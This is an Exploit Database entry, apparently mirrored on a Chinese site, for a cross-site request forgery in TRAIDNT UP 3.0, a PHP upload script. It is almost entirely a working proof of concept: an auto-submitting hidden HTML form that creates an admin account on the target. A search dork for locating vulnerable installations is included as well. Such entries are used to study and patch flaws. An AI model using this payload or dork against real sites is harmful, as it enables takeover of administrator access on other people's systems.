Traidnt Up 3.0 – Cross-Site Request Forgery

• Exploit Database
• 9 阅读

• 作者： P0C T34M
  日期： 2010-12-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15826/

• #Title:TRAIDNT UP Version 3.0- CSRF Add Admin
  #Script :TRAIDNT UP Version 3.0 
  #Language : Php
  #Download : http://www.traidnt.net
  #http://www.traidnt.net/vb/attachment.php?attachmentid=519880&d=1285278011
  #Date : 2010/12/25
  #Version: 3.0
  #Dork : "Powered by TRAIDNT UP Version 3.0 "
  #Found: by P0C T34M >> tnt-r00t 
  #Homepage : www.p0c.cc
  
  
  
  <html>
  <form name="p0c" action="http://127.0.0.1/up/admin/users.php?do=addnew" method="post">
  <input type="hidden" name="name" value="r00t3d"/>
  <input type="hidden" name="password" value="Password"/>
  <input type="hidden" name="email" value="myemail@hotmail.com"/>
  <input type="hidden" name="birthdate" value="1987"/>
  <input type="hidden" name="country" value="SA"/>
  <input type="hidden" name="group" value="1"/>
  </form>
  <script>document.p0c.submit();</script>
  </html>
  TRAIDNT UP Version 3.0- CSRF Add Admin